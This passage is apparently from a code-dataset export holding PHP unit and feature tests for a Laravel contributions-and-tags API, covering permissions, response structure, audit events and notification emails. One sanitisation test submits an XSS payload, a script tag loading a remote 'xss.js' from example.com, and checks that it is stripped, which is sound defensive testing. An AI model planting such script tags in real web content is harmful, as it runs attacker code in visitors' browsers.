"blob_id": "68c384d80b626bd7b9fd5ebdd45398033e0e23e4",
"content_id": "51139701017e4dd52ccf4fdaf79cee58eab0d396",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 5652,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 188,
"path": "/tests/Unit/Services/TagServiceTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Unit\\Services;\n\nuse App\\Events\\Tag\\TagCreated;\nuse App\\Events\\Tag\\TagForceDeleted;\nuse App\\Events\\Tag\\TagSoftDeleted;\nuse App\\Models\\Contribution;\nuse App\\Models\\Tag;\nuse App\\Services\\TagService;\nuse Illuminate\\Support\\Facades\\Event;\nuse Tests\\TestCase;\n\nclass TagServiceTest extends TestCase\n{\n /** @test */\n public function it_creates_a_tag_record(): void\n {\n /** @var \\App\\Services\\TagService $tagService */\n $tagService = resolve(TagService::class);\n\n /** @var \\App\\Models\\Tag $parentTag */\n $parentTag = factory(Tag::class)->create();\n\n $tag = $tagService->create([\n 'parent_tag_id' => $parentTag->id,\n 'name' => 'New Tag',\n ]);\n\n $this->assertDatabaseHas('tags', ['id' => $tag->id]);\n $this->assertEquals($parentTag->id, $tag->parentTag->id);\n $this->assertEquals('New Tag', $tag->name);\n }\n\n /** @test */\n public function it_dispatches_an_event_when_created(): void\n {\n Event::fake([TagCreated::class]);\n\n /** @var \\App\\Services\\TagService $tagService */\n $tagService = resolve(TagService::class);\n\n $tag = $tagService->create([\n 'name' => 'New Tag',\n ]);\n\n Event::assertDispatched(\n TagCreated::class,\n function (TagCreated $event) use ($tag): bool {\n return $event->getTag()->is($tag);\n }\n );\n }\n\n /** @test */\n public function it_soft_deletes_a_tag_record(): void\n {\n /** @var \\App\\Services\\TagService $tagService */\n $tagService = resolve(TagService::class);\n\n /** @var \\App\\Models\\Tag $parentTag */\n $parentTag = factory(Tag::class)->create();\n\n /** @var \\App\\Models\\Tag $tag */\n $tag = factory(Tag::class)->create([\n 'parent_tag_id' => $parentTag->id,\n ]);\n\n $tag = $tagService->softDelete($tag);\n\n $this->assertDatabaseHas('tags', [\n 'id' => $parentTag->id,\n 'deleted_at' => null,\n ]);\n $this->assertDatabaseHas('tags', ['id' => $tag->id]);\n $this->assertSoftDeleted('tags', ['id' => $tag->id]);\n }\n\n /** @test */\n public function it_soft_deletes_a_parent_tag_along_with_child_records(): void\n {\n /** @var \\App\\Services\\TagService $tagService */\n $tagService = resolve(TagService::class);\n\n /** @var \\App\\Models\\Tag $parentTag */\n $parentTag = factory(Tag::class)->create();\n\n /** @var \\App\\Models\\Tag $tag */\n $tag = factory(Tag::class)->create([\n 'parent_tag_id' => $parentTag->id,\n ]);\n\n $parentTag = $tagService->softDelete($parentTag);\n\n $this->assertDatabaseHas('tags', ['id' => $parentTag->id]);\n $this->assertSoftDeleted('tags', ['id' => $parentTag->id]);\n $this->assertDatabaseHas('tags', ['id' => $tag->id]);\n $this->assertSoftDeleted('tags', ['id' => $tag->id]);\n }\n\n /** @test */\n public function it_dispatches_an_event_when_soft_deleted(): void\n {\n Event::fake([TagSoftDeleted::class]);\n\n /** @var \\App\\Services\\TagService $tagService */\n $tagService = resolve(TagService::class);\n\n /** @var \\App\\Models\\Tag $tag */\n $tag = factory(Tag::class)->create();\n\n $tagService->softDelete($tag);\n\n Event::assertDispatched(\n TagSoftDeleted::class,\n function (TagSoftDeleted $event) use ($tag): bool {\n return $event->getTag()->is($tag);\n }\n );\n }\n\n /** @test */\n public function it_force_deletes_a_parent_tag_along_with_child_records(): void\n {\n /** @var \\App\\Services\\TagService $tagService */\n $tagService = resolve(TagService::class);\n\n /** @var \\App\\Models\\Tag $parentTag */\n $parentTag = factory(Tag::class)->create();\n\n /** @var \\App\\Models\\Tag $tag */\n $tag = 
factory(Tag::class)->create([\n 'parent_tag_id' => $parentTag->id,\n ]);\n\n $tagService->forceDelete($parentTag);\n\n $this->assertDatabaseMissing('tags', ['id' => $parentTag->id]);\n $this->assertDatabaseMissing('tags', ['id' => $tag->id]);\n }\n\n /** @test */\n public function it_force_deletes_a_tag_along_with_contributions(): void\n {\n /** @var \\App\\Services\\TagService $tagService */\n $tagService = resolve(TagService::class);\n\n /** @var \\App\\Models\\Tag $tag */\n $tag = factory(Tag::class)->create();\n\n /** @var \\App\\Models\\Contribution $contribution */\n $contribution = factory(Contribution::class)->create();\n\n $contribution->tags()->sync([$tag->id]);\n\n $tagService->forceDelete($tag);\n\n $this->assertDatabaseMissing('tags', ['id' => $tag->id]);\n $this->assertDatabaseHas('contributions', ['id' => $contribution->id]);\n $this->assertDatabaseMissing('contribution_tag', [\n 'contribution_id' => $contribution->id,\n 'tag_id' => $tag->id,\n ]);\n }\n\n /** @test */\n public function it_dispatches_an_event_when_force_deleted(): void\n {\n Event::fake([TagForceDeleted::class]);\n\n /** @var \\App\\Services\\TagService $tagService */\n $tagService = resolve(TagService::class);\n\n /** @var \\App\\Models\\Tag $tag */\n $tag = factory(Tag::class)->create();\n\n $tagService->forceDelete($tag);\n\n Event::assertDispatched(\n TagForceDeleted::class,\n function (TagForceDeleted $event) use ($tag): bool {\n return $event->getTag()->is($tag);\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5218106508255005,
"alphanum_fraction": 0.527212917804718,
"avg_line_length": 31.436052322387695,
"blob_id": "421e1082e61152a52a67c94e525e370637777857",
"content_id": "22b71e8c2de982875f8f932859acb354408afc37",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 32209,
"license_type": "permissive",
"max_line_length": 112,
"num_lines": 993,
"path": "/tests/Feature/V1/ContributionControllerTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Feature\\V1;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Mail\\TemplateMail;\nuse App\\Models\\Admin;\nuse App\\Models\\Audit;\nuse App\\Models\\Contribution;\nuse App\\Models\\EndUser;\nuse App\\Models\\Setting;\nuse App\\Models\\Tag;\nuse App\\VariableSubstitution\\Email\\Admin\\NewContributionSubstituter;\nuse App\\VariableSubstitution\\Email\\Admin\\UpdatedContributionSubstituter;\nuse Illuminate\\Http\\Response;\nuse Illuminate\\Support\\Arr;\nuse Illuminate\\Support\\Facades\\Date;\nuse Illuminate\\Support\\Facades\\Event;\nuse Illuminate\\Support\\Facades\\Queue;\nuse Laravel\\Passport\\Passport;\nuse Tests\\TestCase;\n\nclass ContributionControllerTest extends TestCase\n{\n /*\n * Index.\n */\n\n /** @test */\n public function guest_can_index(): void\n {\n $response = $this->getJson('/v1/contributions');\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function end_user_can_index(): void\n {\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->getJson('/v1/contributions');\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function admin_can_index(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/contributions');\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function structure_correct_for_index(): void\n {\n $contribution = factory(Contribution::class)->create();\n $tag = factory(Tag::class)->create();\n $contribution->tags()->attach($tag);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/contributions');\n\n $response->assertCollectionDataStructure([\n 'id',\n 'end_user_id',\n 'content',\n 'excerpt',\n 'status',\n 'changes_requested',\n 'status_last_updated_at',\n 'created_at',\n 'updated_at',\n 'tags' => [\n '*' => [\n 'id',\n 'parent_tag_id',\n 'name',\n 'public_contributions_count',\n 'created_at',\n 'updated_at',\n 'deleted_at',\n ],\n ],\n ]);\n }\n\n /** @test */\n public function values_correct_for_index(): void\n {\n $contribution = factory(Contribution::class)->create();\n $tag = factory(Tag::class)->create();\n $contribution->tags()->attach($tag);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/contributions');\n\n $response->assertJsonFragment([\n [\n 'id' => $contribution->id,\n 'end_user_id' => $contribution->endUser->id,\n 'content' => $contribution->content,\n 'excerpt' => $contribution->getExcerpt(),\n 'status' => $contribution->status,\n 'changes_requested' => $contribution->changes_requested,\n 'status_last_updated_at' => $contribution->status_last_updated_at->toIso8601String(),\n 'created_at' => $contribution->created_at->toIso8601String(),\n 'updated_at' => $contribution->updated_at->toIso8601String(),\n 'tags' => [\n [\n 'id' => $tag->id,\n 'parent_tag_id' => $tag->parent_tag_id,\n 'name' => $tag->name,\n 'public_contributions_count' => $tag->publicContributions()->count(),\n 'created_at' => $tag->created_at->toIso8601String(),\n 'updated_at' => $tag->updated_at->toIso8601String(),\n 'deleted_at' => null,\n ],\n ],\n ],\n ]);\n }\n\n /** @test */\n public function can_filter_by_ids_for_index(): void\n {\n $contribution1 = factory(Contribution::class)->create();\n $contribution2 = factory(Contribution::class)->create();\n $contribution3 = factory(Contribution::class)->create();\n\n 
Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/contributions', [\n 'filter[id]' => \"{$contribution1->id},{$contribution2->id}\",\n ]);\n\n $response->assertJsonFragment(['id' => $contribution1->id]);\n $response->assertJsonFragment(['id' => $contribution2->id]);\n $response->assertJsonMissing(['id' => $contribution3->id]);\n }\n\n /** @test */\n public function admin_can_filter_by_end_user_id_for_index(): void\n {\n $contribution1 = factory(Contribution::class)->create();\n $contribution2 = factory(Contribution::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/contributions', ['filter[end_user_id]' => $contribution1->endUser->id]);\n\n $response->assertJsonFragment(['id' => $contribution1->id]);\n $response->assertJsonMissing(['id' => $contribution2->id]);\n }\n\n /** @test */\n public function can_filter_by_tag_ids_for_index(): void\n {\n $contribution1 = factory(Contribution::class)->create();\n $tag1 = factory(Tag::class)->create();\n $contribution1->tags()->attach($tag1);\n\n $contribution2 = factory(Contribution::class)->create();\n $tag2 = factory(Tag::class)->create();\n $contribution2->tags()->attach($tag2);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/contributions', ['filter[tag_ids]' => $tag1->id]);\n\n $response->assertJsonFragment(['id' => $contribution1->id]);\n $response->assertJsonMissing(['id' => $contribution2->id]);\n }\n\n /** @test */\n public function can_filter_by_untagged_for_index(): void\n {\n $contribution1 = factory(Contribution::class)->create();\n $tag1 = factory(Tag::class)->create(['deleted_at' => Date::now()]);\n $contribution1->tags()->attach($tag1);\n\n $contribution2 = factory(Contribution::class)->create();\n $tag2 = factory(Tag::class)->create();\n $contribution2->tags()->attach($tag2);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/contributions', ['filter[tag_ids]' => 'untagged']);\n\n $response->assertJsonFragment(['id' => $contribution1->id]);\n $response->assertJsonMissing(['id' => $contribution2->id]);\n }\n\n /** @test */\n public function can_sort_by_created_at_for_index(): void\n {\n $contribution1 = factory(Contribution::class)->create([\n 'created_at' => Date::now(),\n ]);\n $contribution2 = factory(Contribution::class)->create([\n 'created_at' => Date::now()->addHour(),\n ]);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/contributions', ['sort' => '-created_at']);\n\n $response->assertNthIdInCollection(1, $contribution1->id);\n $response->assertNthIdInCollection(0, $contribution2->id);\n }\n\n /** @test */\n public function guest_can_only_view_public_for_index(): void\n {\n $publicContribution = factory(Contribution::class)\n ->create();\n $privateContribution = factory(Contribution::class)\n ->state(Contribution::STATUS_PRIVATE)\n ->create();\n $inReviewContribution = factory(Contribution::class)\n ->state(Contribution::STATUS_IN_REVIEW)\n ->create();\n $changesRequestedContribution = factory(Contribution::class)\n ->state(Contribution::STATUS_CHANGES_REQUESTED)\n ->create();\n\n $response = $this->getJson('/v1/contributions');\n\n $response->assertJsonFragment(['id' => $publicContribution->id]);\n $response->assertJsonMissing(['id' => $privateContribution->id]);\n $response->assertJsonMissing(['id' => $inReviewContribution->id]);\n 
$response->assertJsonMissing(['id' => $changesRequestedContribution->id]);\n }\n\n /** @test */\n public function end_user_can_only_view_public_and_their_own_for_index(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n $endUserContribution = factory(Contribution::class)\n ->state(Contribution::STATUS_PRIVATE)\n ->create(['end_user_id' => $endUser->id]);\n $publicContribution = factory(Contribution::class)\n ->create();\n $privateContribution = factory(Contribution::class)\n ->state(Contribution::STATUS_PRIVATE)\n ->create();\n $inReviewContribution = factory(Contribution::class)\n ->state(Contribution::STATUS_IN_REVIEW)\n ->create();\n $changesRequestedContribution = factory(Contribution::class)\n ->state(Contribution::STATUS_CHANGES_REQUESTED)\n ->create();\n\n Passport::actingAs($endUser->user);\n\n $response = $this->getJson('/v1/contributions');\n\n $response->assertJsonFragment(['id' => $endUserContribution->id]);\n $response->assertJsonFragment(['id' => $publicContribution->id]);\n $response->assertJsonMissing(['id' => $privateContribution->id]);\n $response->assertJsonMissing(['id' => $inReviewContribution->id]);\n $response->assertJsonMissing(['id' => $changesRequestedContribution->id]);\n }\n\n /** @test */\n public function end_user_can_filter_only_their_own_for_index(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n $endUserContribution = factory(Contribution::class)\n ->state(Contribution::STATUS_PRIVATE)\n ->create(['end_user_id' => $endUser->id]);\n $publicContribution = factory(Contribution::class)\n ->create();\n $privateContribution = factory(Contribution::class)\n ->state(Contribution::STATUS_PRIVATE)\n ->create();\n $inReviewContribution = factory(Contribution::class)\n ->state(Contribution::STATUS_IN_REVIEW)\n ->create();\n $changesRequestedContribution = factory(Contribution::class)\n ->state(Contribution::STATUS_CHANGES_REQUESTED)\n ->create();\n\n Passport::actingAs($endUser->user);\n\n $response = $this->getJson('/v1/contributions', ['filter[end_user_id]' => $endUser->id]);\n\n $response->assertJsonFragment(['id' => $endUserContribution->id]);\n $response->assertJsonMissing(['id' => $publicContribution->id]);\n $response->assertJsonMissing(['id' => $privateContribution->id]);\n $response->assertJsonMissing(['id' => $inReviewContribution->id]);\n $response->assertJsonMissing(['id' => $changesRequestedContribution->id]);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_index(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\User $user */\n $user = factory(Admin::class)->create()->user;\n\n Passport::actingAs($user);\n\n $this->getJson('/v1/contributions');\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($user): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_READ\n && $event->getDescription() === 'Viewed all contributions.'\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n\n /*\n * Store.\n */\n\n /** @test */\n public function guest_cannot_store(): void\n {\n $response = $this->postJson('/v1/contributions');\n\n $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n }\n\n /** @test */\n public function end_user_can_store(): void\n {\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $tag = factory(Tag::class)->create();\n\n $response = $this->postJson('/v1/contributions', [\n 'content' => 
'Lorem ipsum',\n 'status' => Contribution::STATUS_PRIVATE,\n 'tags' => [\n ['id' => $tag->id],\n ],\n ]);\n\n $response->assertStatus(Response::HTTP_CREATED);\n }\n\n /** @test */\n public function admin_cannot_store(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->postJson('/v1/contributions');\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function structure_correct_for_store(): void\n {\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $tag = factory(Tag::class)->create();\n\n $response = $this->postJson('/v1/contributions', [\n 'content' => 'Lorem ipsum',\n 'status' => Contribution::STATUS_PRIVATE,\n 'tags' => [\n ['id' => $tag->id],\n ],\n ]);\n\n $response->assertResourceDataStructure([\n 'id',\n 'end_user_id',\n 'content',\n 'excerpt',\n 'status',\n 'changes_requested',\n 'status_last_updated_at',\n 'created_at',\n 'updated_at',\n 'tags' => [\n '*' => [\n 'id',\n 'parent_tag_id',\n 'name',\n 'public_contributions_count',\n 'created_at',\n 'updated_at',\n 'deleted_at',\n ],\n ],\n ]);\n }\n\n /** @test */\n public function values_correct_for_store(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs($endUser->user);\n\n /** @var \\App\\Models\\Tag $tag */\n $tag = factory(Tag::class)->create();\n\n Date::setTestNow(Date::now());\n\n $response = $this->postJson('/v1/contributions', [\n 'content' => 'Lorem ipsum',\n 'status' => Contribution::STATUS_PRIVATE,\n 'tags' => [\n ['id' => $tag->id],\n ],\n ]);\n\n $response->assertJsonFragment([\n 'end_user_id' => $endUser->id,\n 'content' => 'Lorem ipsum',\n 'excerpt' => 'Lorem ipsum',\n 'status' => Contribution::STATUS_PRIVATE,\n 'changes_requested' => null,\n 'status_last_updated_at' => Date::now()->toIso8601String(),\n 'created_at' => Date::now()->toIso8601String(),\n 'updated_at' => Date::now()->toIso8601String(),\n 'tags' => [\n [\n 'id' => $tag->id,\n 'parent_tag_id' => $tag->parent_tag_id,\n 'name' => $tag->name,\n 'public_contributions_count' => $tag->publicContributions()->count(),\n 'created_at' => $tag->created_at->toIso8601String(),\n 'updated_at' => $tag->updated_at->toIso8601String(),\n 'deleted_at' => null,\n ],\n ],\n ]);\n }\n\n /** @test */\n public function content_markdown_is_sanitised_for_store(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs($endUser->user);\n\n $response = $this->postJson('/v1/contributions', [\n 'content' => <<<'EOT'\n # This is the heading\n \n <p>This is a HTML paragraph.</p>\n \n This is a standard paragraph.\n \n <script src=\"https://example.com/xss.js\"></script>\n EOT,\n 'status' => Contribution::STATUS_PRIVATE,\n 'tags' => [],\n ]);\n\n $response->assertJsonFragment([\n 'content' => <<<'EOT'\n # This is the heading\n \n This is a HTML paragraph.\n \n This is a standard paragraph.\n EOT,\n ]);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_store(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\User $user */\n $user = factory(EndUser::class)->create()->user;\n\n Passport::actingAs($user);\n\n $response = $this->postJson('/v1/contributions', [\n 'content' => 'Lorem ipsum',\n 'status' => Contribution::STATUS_PRIVATE,\n 'tags' => [],\n ]);\n\n $contribution = Contribution::findOrFail($response->getId());\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($contribution, $user): bool {\n return 
$event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_CREATE\n && $event->getDescription() === \"Created contribution [{$contribution->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n\n /** @test */\n public function email_sent_to_admins_for_store(): void\n {\n Queue::fake();\n\n /** @var \\App\\Models\\User $user */\n $user = factory(EndUser::class)->create()->user;\n\n Passport::actingAs($user);\n\n $this->postJson('/v1/contributions', [\n 'content' => 'Lorem ipsum',\n 'status' => Contribution::STATUS_PRIVATE,\n 'tags' => [],\n ]);\n\n Queue::assertPushed(\n TemplateMail::class,\n function (TemplateMail $mail): bool {\n /** @var array $emailContent */\n $emailContent = Setting::findOrFail('email_content')->value;\n\n return $mail->getTo() === config('connecting_voices.admin_email')\n && $mail->getSubject() === Arr::get($emailContent, 'admin.new_contribution.subject')\n && $mail->getBody() === Arr::get($emailContent, 'admin.new_contribution.body')\n && $mail->getSubstituter() instanceof NewContributionSubstituter;\n }\n );\n }\n\n /*\n * Show.\n */\n\n /** @test */\n public function when_public_guest_can_show(): void\n {\n $contribution = factory(Contribution::class)->create();\n\n $response = $this->getJson(\"/v1/contributions/{$contribution->id}\");\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function when_public_end_user_can_show(): void\n {\n $contribution = factory(Contribution::class)->create();\n\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->getJson(\"/v1/contributions/{$contribution->id}\");\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function when_public_admin_can_show(): void\n {\n $contribution = factory(Contribution::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson(\"/v1/contributions/{$contribution->id}\");\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function structure_correct_for_show(): void\n {\n /** @var \\App\\Models\\Contribution $contribution */\n $contribution = factory(Contribution::class)->create();\n $contribution->tags()->sync([\n factory(Tag::class)->create()->id,\n ]);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson(\"/v1/contributions/{$contribution->id}\");\n\n $response->assertResourceDataStructure([\n 'id',\n 'end_user_id',\n 'content',\n 'excerpt',\n 'status',\n 'changes_requested',\n 'status_last_updated_at',\n 'created_at',\n 'updated_at',\n 'tags' => [\n '*' => [\n 'id',\n 'parent_tag_id',\n 'name',\n 'public_contributions_count',\n 'created_at',\n 'updated_at',\n 'deleted_at',\n ],\n ],\n ]);\n }\n\n /** @test */\n public function values_correct_for_show(): void\n {\n /** @var \\App\\Models\\Contribution $contribution */\n $contribution = factory(Contribution::class)->create();\n\n /** @var \\App\\Models\\Tag $tag */\n $tag = factory(Tag::class)->create();\n\n $contribution->tags()->sync([$tag->id]);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson(\"/v1/contributions/{$contribution->id}\");\n\n $response->assertJsonFragment([\n 'id' => $contribution->id,\n 'end_user_id' => $contribution->end_user_id,\n 'content' => $contribution->content,\n 'excerpt' => $contribution->getExcerpt(),\n 'status' => $contribution->status,\n 
'changes_requested' => null,\n            'status_last_updated_at' => $contribution->status_last_updated_at->toIso8601String(),\n            'created_at' => $contribution->created_at->toIso8601String(),\n            'updated_at' => $contribution->updated_at->toIso8601String(),\n            'tags' => [\n                [\n                    'id' => $tag->id,\n                    'parent_tag_id' => $tag->parent_tag_id,\n                    'name' => $tag->name,\n                    'public_contributions_count' => $tag->publicContributions()->count(),\n                    'created_at' => $tag->created_at->toIso8601String(),\n                    'updated_at' => $tag->updated_at->toIso8601String(),\n                    'deleted_at' => null,\n                ],\n            ],\n        ]);\n    }\n\n    /** @test */\n    public function guest_cannot_view_private_for_show(): void\n    {\n        $privateContribution = factory(Contribution::class)\n            ->state(Contribution::STATUS_PRIVATE)\n            ->create();\n\n        $response = $this->getJson(\"/v1/contributions/{$privateContribution->id}\");\n\n        $response->assertStatus(Response::HTTP_FORBIDDEN);\n    }\n\n    /** @test */\n    public function end_user_can_view_their_own_for_show(): void\n    {\n        $endUser = factory(EndUser::class)->create();\n\n        $endUserPrivateContribution = factory(Contribution::class)\n            ->state(Contribution::STATUS_PRIVATE)\n            ->create(['end_user_id' => $endUser->id]);\n\n        Passport::actingAs($endUser->user);\n\n        $response = $this->getJson(\"/v1/contributions/{$endUserPrivateContribution->id}\");\n\n        $response->assertStatus(Response::HTTP_OK);\n    }\n\n    /** @test */\n    public function endpoint_invoked_event_dispatched_for_show(): void\n    {\n        Event::fake([EndpointInvoked::class]);\n\n        /** @var \\App\\Models\\Contribution $contribution */\n        $contribution = factory(Contribution::class)->create();\n\n        /** @var \\App\\Models\\User $user */\n        $user = factory(Admin::class)->create()->user;\n\n        Passport::actingAs($user);\n\n        $this->getJson(\"/v1/contributions/{$contribution->id}\");\n\n        Event::assertDispatched(\n            EndpointInvoked::class,\n            function (EndpointInvoked $event) use ($contribution, $user): bool {\n                return $event->getUser()->is($user)\n                    && $event->getClient() === null\n                    && $event->getAction() === Audit::ACTION_READ\n                    && $event->getDescription() === \"Viewed contribution [{$contribution->id}].\"\n                    && $event->getIpAddress() === '127.0.0.1'\n                    && $event->getUserAgent() === 'Symfony';\n            }\n        );\n    }\n\n    /*\n     * Update.\n     */\n\n    /** @test */\n    public function guest_cannot_update(): void\n    {\n        $contribution = factory(Contribution::class)->create();\n\n        $response = $this->putJson(\"/v1/contributions/{$contribution->id}\");\n\n        $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n    }\n\n    /** @test */\n    public function end_user_cannot_use_someone_elses_to_update(): void\n    {\n        $contribution = factory(Contribution::class)->create();\n\n        Passport::actingAs(\n            factory(EndUser::class)->create()->user\n        );\n\n        $response = $this->putJson(\"/v1/contributions/{$contribution->id}\");\n\n        $response->assertStatus(Response::HTTP_FORBIDDEN);\n    }\n\n    /** @test */\n    public function end_user_can_use_their_own_to_update(): void\n    {\n        $endUser = factory(EndUser::class)->create();\n\n        $contribution = factory(Contribution::class)->create([\n            'end_user_id' => $endUser->id,\n        ]);\n\n        $tag = factory(Tag::class)->create();\n\n        Passport::actingAs($endUser->user);\n\n        $response = $this->putJson(\"/v1/contributions/{$contribution->id}\", [\n            'content' => 'Lorem ipsum',\n            'status' => Contribution::STATUS_IN_REVIEW,\n            'tags' => [\n                ['id' => $tag->id],\n            ],\n        ]);\n\n        $response->assertStatus(Response::HTTP_OK);\n    }\n\n    /** @test */\n    public function admin_cannot_update(): void\n    {\n        $contribution = factory(Contribution::class)->create();\n\n        Passport::actingAs(\n            factory(Admin::class)->create()->user\n        );\n\n        $response = $this->putJson(\"/v1/contributions/{$contribution->id}\");\n\n        $response->assertStatus(Response::HTTP_FORBIDDEN);\n    }\n\n    /** @test */\n    public function endpoint_invoked_event_dispatched_for_update(): void\n    {\n        Event::fake([EndpointInvoked::class]);\n\n        /** @var \\App\\Models\\EndUser $endUser */\n        $endUser = factory(EndUser::class)->create();\n\n        /** @var \\App\\Models\\Contribution $contribution */\n        $contribution = factory(Contribution::class)->create([\n            'end_user_id' => $endUser->id,\n        ]);\n\n        Passport::actingAs($endUser->user);\n\n        $this->putJson(\"/v1/contributions/{$contribution->id}\", [\n            'content' => 'Lorem ipsum',\n            'status' => Contribution::STATUS_IN_REVIEW,\n            'tags' => [],\n        ]);\n\n        Event::assertDispatched(\n            EndpointInvoked::class,\n            function (EndpointInvoked $event) use ($contribution, $endUser): bool {\n                return $event->getUser()->is($endUser->user)\n                    && $event->getClient() === null\n                    && $event->getAction() === Audit::ACTION_UPDATE\n                    && $event->getDescription() === \"Updated contribution [{$contribution->id}].\"\n                    && $event->getIpAddress() === '127.0.0.1'\n                    && $event->getUserAgent() === 'Symfony';\n            }\n        );\n    }\n\n    /** @test */\n    public function email_sent_to_admins_for_update(): void\n    {\n        Queue::fake();\n\n        /** @var \\App\\Models\\EndUser $endUser */\n        $endUser = factory(EndUser::class)->create();\n\n        /** @var \\App\\Models\\Contribution $contribution */\n        $contribution = factory(Contribution::class)->create([\n            'end_user_id' => $endUser->id,\n        ]);\n\n        Passport::actingAs($endUser->user);\n\n        $this->putJson(\"/v1/contributions/{$contribution->id}\", [\n            'content' => 'Lorem ipsum',\n            'status' => Contribution::STATUS_IN_REVIEW,\n            'tags' => [],\n        ]);\n\n        Queue::assertPushed(\n            TemplateMail::class,\n            function (TemplateMail $mail): bool {\n                /** @var array $emailContent */\n                $emailContent = Setting::findOrFail('email_content')->value;\n\n                return $mail->getTo() === config('connecting_voices.admin_email')\n                    && $mail->getSubject() === Arr::get($emailContent, 'admin.updated_contribution.subject')\n                    && $mail->getBody() === Arr::get($emailContent, 'admin.updated_contribution.body')\n                    && $mail->getSubstituter() instanceof UpdatedContributionSubstituter;\n            }\n        );\n    }\n\n    /*\n     * Destroy.\n     */\n\n    /** @test */\n    public function guest_cannot_destroy(): void\n    {\n        $contribution = factory(Contribution::class)->create();\n\n        $response = $this->deleteJson(\"/v1/contributions/{$contribution->id}\");\n\n        $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n    }\n\n    /** @test */\n    public function end_user_using_someone_elses_cannot_destroy(): void\n    {\n        $contribution = factory(Contribution::class)->create();\n\n        Passport::actingAs(\n            factory(EndUser::class)->create()->user\n        );\n\n        $response = $this->deleteJson(\"/v1/contributions/{$contribution->id}\");\n\n        $response->assertStatus(Response::HTTP_FORBIDDEN);\n    }\n\n    /** @test */\n    public function end_user_using_their_own_can_destroy(): void\n    {\n        $endUser = factory(EndUser::class)->create();\n\n        $contribution = factory(Contribution::class)->create([\n            'end_user_id' => $endUser->id,\n        ]);\n\n        Passport::actingAs($endUser->user);\n\n        $response = $this->deleteJson(\"/v1/contributions/{$contribution->id}\");\n\n        $response->assertStatus(Response::HTTP_OK);\n    }\n\n    /** @test */\n    public function admin_can_destroy(): void\n    {\n        $contribution = factory(Contribution::class)->create();\n\n        Passport::actingAs(\n            factory(Admin::class)->create()->user\n        );\n\n        $response = $this->deleteJson(\"/v1/contributions/{$contribution->id}\");\n\n        $response->assertStatus(Response::HTTP_OK);\n    }\n\n    /** @test */\n    public function database_records_and_relationships_deleted_for_destroy(): void\n    {\n        /** @var \\App\\Models\\Contribution $contribution */\n        $contribution = factory(Contribution::class)->create();\n\n        /** @var \\App\\Models\\Tag $tag */\n        $tag = factory(Tag::class)->create();\n\n        $contribution->tags()->sync($tag->id);\n\n        Passport::actingAs(\n            factory(Admin::class)->create()->user\n        );\n\n        $this->deleteJson(\"/v1/contributions/{$contribution->id}\");\n\n        $this->assertDatabaseMissing('contributions', ['id' => $contribution->id]);\n        $this->assertDatabaseMissing('contribution_tag', [\n            'contribution_id' => $contribution->id,\n            'tag_id' => $tag->id,\n        ]);\n        $this->assertDatabaseHas('tags', ['id' => $tag->id]);\n    }\n\n    /** @test 